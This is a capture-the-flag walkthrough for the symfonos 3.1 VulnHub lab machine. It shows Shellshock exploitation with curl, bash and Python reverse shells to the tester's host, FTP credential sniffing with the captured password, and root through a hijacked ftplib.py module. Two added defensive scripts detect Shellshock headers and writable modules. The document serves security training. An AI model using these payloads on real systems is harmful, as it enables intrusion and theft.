[攻略鸭] symfonos 3.1 VulnHub machine walkthrough

This article is purely fictional. 攻略鸭 would appreciate your follows and likes on Bilibili!
Target machine IP address: 192.168.31.37
Test machine IP address: 192.168.31.38
External information gathering
Visit http://192.168.31.37/
The page source contains a comment:
<!-- Can you bust the underworld? -->
Port scan
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.5b
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
Website directory enumeration
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/FUZZ
http://192.168.31.37/gate/
Visiting it shows nothing but an image.
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/gate/FUZZ
http://192.168.31.37/gate/cerberus/
Visiting it again shows nothing but an image.
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/gate/cerberus/FUZZ
No results.
Try a different wordlist.
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.31.37/FUZZ
.hta [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 3ms]
cgi-bin/ [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 1ms]
.htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 87ms]
gate [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 0ms]
index.html [Status: 200, Size: 241, Words: 24, Lines: 23, Duration: 1ms]
.htaccess [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 174ms]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 0ms]
/cgi-bin/ suggests there may be a CGI application on the machine.
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.31.37/cgi-bin/FUZZ
No results.
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/cgi-bin/FUZZ
underworld [Status: 200, Size: 62, Words: 14, Lines: 2, Duration: 149ms]
Visit http://192.168.31.37/cgi-bin/underworld
It returns: 21:20:03 up 1:55, 0 users, load average: 0.22, 1.08, 0.72
Shellshock vulnerability
curl -H "Connection: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'" http://192.168.31.37/cgi-bin/underworld
root:x:0:0:root:/root:/bin/bash
...
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
hades:x:1000:1000:,,,:/home/hades:/bin/bash
cerberus:x:1001:1001:,,,:/home/cerberus:/bin/bash
proftpd:x:108:65534::/run/proftpd:/bin/false
ftp:x:109:65534::/srv/ftp:/bin/false
nc -nvlp 443
curl -H "Connection: () { : ;};echo;echo;/bin/bash -i &>/dev/tcp/192.168.31.38/443 <&1" http://192.168.31.37/cgi-bin/underworld
cerberus@symfonos3:/usr/lib/cgi-bin$ id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
python -c 'import pty;pty.spawn("/bin/bash")'
$ searchsploit -m 36742.txt
This did not work.
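The CGI script above is exploitable because the web server copies every request header into an HTTP_* environment variable and the vulnerable bash parses the "() {" prefix as a function definition. The following detection helper is an added example for defenders, not part of the original walkthrough: it scans the head of a raw HTTP request and reports which headers carry that marker, so it can sit in a reverse proxy, WAF rule or log triage script. The sample requests are constructed here and modelled on the probe sent to /cgi-bin/underworld.

```python
import re

# Bash's exported-function marker that Shellshock abuses: "() {" at the very
# start of an environment variable's value. Because CGI servers export request
# headers as HTTP_* variables, the marker can arrive in any header, not only
# User-Agent, so every header value must be checked.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


def shellshock_headers(raw_request):
    """Return the names of request headers whose value begins with the bash
    function-definition marker. Input is the raw HTTP request head (request
    line plus headers, CRLF separated, terminated by an empty line)."""
    hits = []
    for line in raw_request.split("\r\n")[1:]:   # skip the request line
        if not line:                              # empty line ends the headers
            break
        name, sep, value = line.partition(":")
        if sep and SHELLSHOCK_RE.match(value):
            hits.append(name.strip())
    return hits


# Constructed samples (not captured traffic): one probe shaped like the one in
# the walkthrough, carried in the Connection header, and one benign request.
SAMPLE_PROBE = (
    "GET /cgi-bin/underworld HTTP/1.1\r\n"
    "Host: 192.168.31.37\r\n"
    "Connection: () { : ;};echo;echo;/bin/bash -c 'id'\r\n"
    "User-Agent: curl/7.64.0\r\n"
    "\r\n"
)
SAMPLE_BENIGN = (
    "GET /cgi-bin/underworld HTTP/1.1\r\n"
    "Host: 192.168.31.37\r\n"
    "User-Agent: curl/7.64.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("probe", SAMPLE_PROBE), ("benign", SAMPLE_BENIGN)):
        print(label, "->", shellshock_headers(req) or "clean")
```

A hit is only an indicator that someone is probing; the real fix is a patched bash (or no bash-backed CGI at all), and a WAF rule based on this check buys time, not immunity.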
Privilege escalation
Watch system processes with pspy
Use pspy to watch running processes for scheduled tasks that are not otherwise visible (/usr/sbin).
cerberus@symfonos3:/tmp$ wget "http://192.168.31.38:8000/pspy64s"
cerberus@symfonos3:/tmp$ chmod +x pspy64s
cerberus@symfonos3:/tmp$ ./pspy64s
2023/02/07 01:55:40 CMD: UID=1000 PID=476 | proftpd: (accepting connections)
2023/02/07 01:56:01 CMD: UID=0 PID=20391 | /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py
2023/02/07 01:56:01 CMD: UID=0 PID=20390 | /bin/sh -c /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt
2023/02/07 01:56:01 CMD: UID=1000 PID=20392 | proftpd: (accepting connections)
2023/02/07 01:56:01 CMD: UID=0 PID=20393 | /usr/sbin/CRON -f
2023/02/07 01:56:01 CMD: UID=105 PID=20394 | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root
2023/02/07 01:56:01 CMD: UID=1000 PID=20395 | /usr/sbin/exim4 -Mc 1pPIpd-0005Iv-CG
1. Capture credentials from FTP's cleartext transmission
cerberus@symfonos3:/usr/sbin$ ip add
1: lo: inet 127.0.0.1/8 scope host lo
2: ens33: inet 192.168.31.37/24 brd 192.168.31.255 scope global ens33
cerberus@symfonos3:/usr/lib/cgi-bin$ id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
The user belongs to the pcap group.
tcpdump -i lo port 21
tcpdump: lo: You don't have permission to capture on that device
(socket: Operation not permitted)
I hit a permission problem, so I deleted the target VM and recreated it.
tcpdump -i lo port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
02:20:01.478756 IP localhost.59512 > localhost.ftp: Flags [P.], seq 1:13, ack 56, win 342, options [nop,nop,TS val 4294944980 ecr 4294944980], length 12: FTP: USER hades
02:20:01.478758 IP localhost.ftp > localhost.59512: Flags [.], ack 13, win 342, options [nop,nop,TS val 4294944980 ecr 4294944980], length 0
02:20:01.479803 IP localhost.ftp > localhost.59512: Flags [P.], seq 56:89, ack 13, win 342, options [nop,nop,TS val 4294944981 ecr 4294944980], length 33: FTP: 331 Password required for hades
02:20:01.479846 IP localhost.59512 > localhost.ftp: Flags [P.], seq 13:36, ack 89, win 342, options [nop,nop,TS val 4294944981 ecr 4294944981], length 23: FTP: PASS PTpZTfU4vxgzvRBE
02:20:01.489005 IP localhost.ftp > localhost.59512: Flags [P.], seq 89:115, ack 36, win 342, options [nop,nop,TS val 4294944983 ecr 4294944981], length 26: FTP: 230 User hades logged in
02:20:01.489102 IP localhost.59512 > localhost.ftp: Flags [P.], seq 36:51, ack 115, win 342, options [nop,nop,TS val 4294944983 ecr 4294944983], length 15: FTP: CWD /srv/ftp/
02:20:01.489378 IP localhost.ftp > localhost.59512: Flags [P.], seq 115:143, ack 51, win 342, options [nop,nop,TS val 4294944983 ecr 4294944983], length 28: FTP: 250 CWD command successful
USER hades
PASS PTpZTfU4vxgzvRBE
Use this username and password to test the SSH service.
ssh hades@192.168.31.37
hades@symfonos3:/tmp$ id
uid=1000(hades) gid=1000(hades) groups=1000(hades),1002(gods)
While watching system processes we saw that the system periodically runs: /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py
$ cat /opt/ftpclient/ftpclient.py
cat: /opt/ftpclient/ftpclient.py: Permission denied
$ ls -al /opt/ftpclient
-rw-r--r-- 1 root hades 262 Apr 6 2020 ftpclient.py
-rw-r--r-- 1 root hades 251 Feb 7 02:55 statuscheck.txt
hades@symfonos3:/opt/ftpclient$ cat ftpclient.py
import ftplib
ftp = ftplib.FTP('127.0.0.1')
ftp.login(user='hades', passwd='PTpZTfU4vxgzvRBE')
ftp.cwd('/srv/ftp/')
def upload():
    filename = '/opt/client/statuscheck.txt'
    ftp.storbinary('STOR '+filename, open(filename, 'rb'))
    ftp.quit()
upload()
Privilege escalation by modifying a Python module
$ find / -name ftplib* 2>/dev/null
/usr/lib/python2.7/ftplib.pyc
/usr/lib/python2.7/ftplib.py
/usr/lib/python3.5/__pycache__/ftplib.cpython-35.pyc
/usr/lib/python3.5/ftplib.py
$ ls -l /usr/lib/python2.7/ftplib.py
-rwxrw-r-- 1 root gods 37755 Sep 26 2018 /usr/lib/python2.7/ftplib.py
We have permission to modify this Python module.
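The root cron job is only hijackable because a standard-library module on the interpreter's search path is group-writable. The audit below is an added example written for this walkthrough (not code from the target or from any project): it scans a directory such as /usr/lib/python2.7 and reports modules whose permission bits or owner would let a non-root user change what root imports. The demo() function builds a constructed temporary directory that mirrors the target's state (ftplib.py mode 664, a neighbour at 644) so it runs offline.

```python
import os
import stat
import sys
import tempfile


def module_write_risks(path, trusted_uids=(0,)):
    """Return reasons why a module file could be modified by someone other than
    a trusted owner: group/world write bits, or an owner uid that is not trusted.
    Any of these lets a local user inject code into every script importing it."""
    st = os.stat(path)
    reasons = []
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_uid not in trusted_uids:
        reasons.append("owner uid %d not trusted" % st.st_uid)
    return reasons


def audit_module_dir(directory, trusted_uids=(0,)):
    """Scan one directory on an interpreter's search path (e.g. /usr/lib/python2.7)
    and return {module_file: reasons} for every risky .py entry."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".py"):
            continue
        reasons = module_write_risks(os.path.join(directory, name), trusted_uids)
        if reasons:
            findings[name] = reasons
    return findings


def demo():
    """Constructed sample: a throwaway directory standing in for /usr/lib/python2.7,
    with ftplib.py left group-writable exactly as on the target (mode 664)."""
    d = tempfile.mkdtemp()
    for name, mode in (("ftplib.py", 0o664), ("socket.py", 0o644)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("# stand-in module\n")
        os.chmod(p, mode)
    # Trust the current uid here so only the permission bits decide the outcome.
    return audit_module_dir(d, trusted_uids=(os.getuid(),))


if __name__ == "__main__":
    # Real use: point it at the directory the root cron job's interpreter loads from.
    target = sys.argv[1] if len(sys.argv) > 1 else "/usr/lib/python2.7"
    for module, why in sorted(audit_module_dir(target).items()):
        print("%s: %s" % (module, ", ".join(why)))
```

A clean result still assumes the directories themselves and the script run by cron are root-owned and not group-writable; extend the same stat checks to those paths for a complete picture.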
1. Create a new ftplib.py that copies /bin/bash, and overwrite the original ftplib.py with it
Back up ftplib.py
cp /usr/lib/python2.7/ftplib.py /tmp/ftplib.py.bak
Create a new ftplib.py
nano /tmp/ftplib.py
import os;os.system("cp /bin/bash /tmp/rootbash;chmod u+s /tmp/rootbash")
Overwrite the original ftplib.py
cp /tmp/ftplib.py /usr/lib/python2.7/ftplib.py
After waiting a while, the bash copy is obtained:
ls -l /tmp/rootbash
/tmp/rootbash
2. Add a Python reverse shell to ftplib.py
$ vi /usr/lib/python2.7/ftplib.py
Add:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.38",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Start a listener on the test machine:
$ nc -nvlp 9000
# id
uid=0(root) gid=0(root) groups=0(root)
Other
Flag
# cat /root/proof.txt
Congrats on rooting symfonos:3!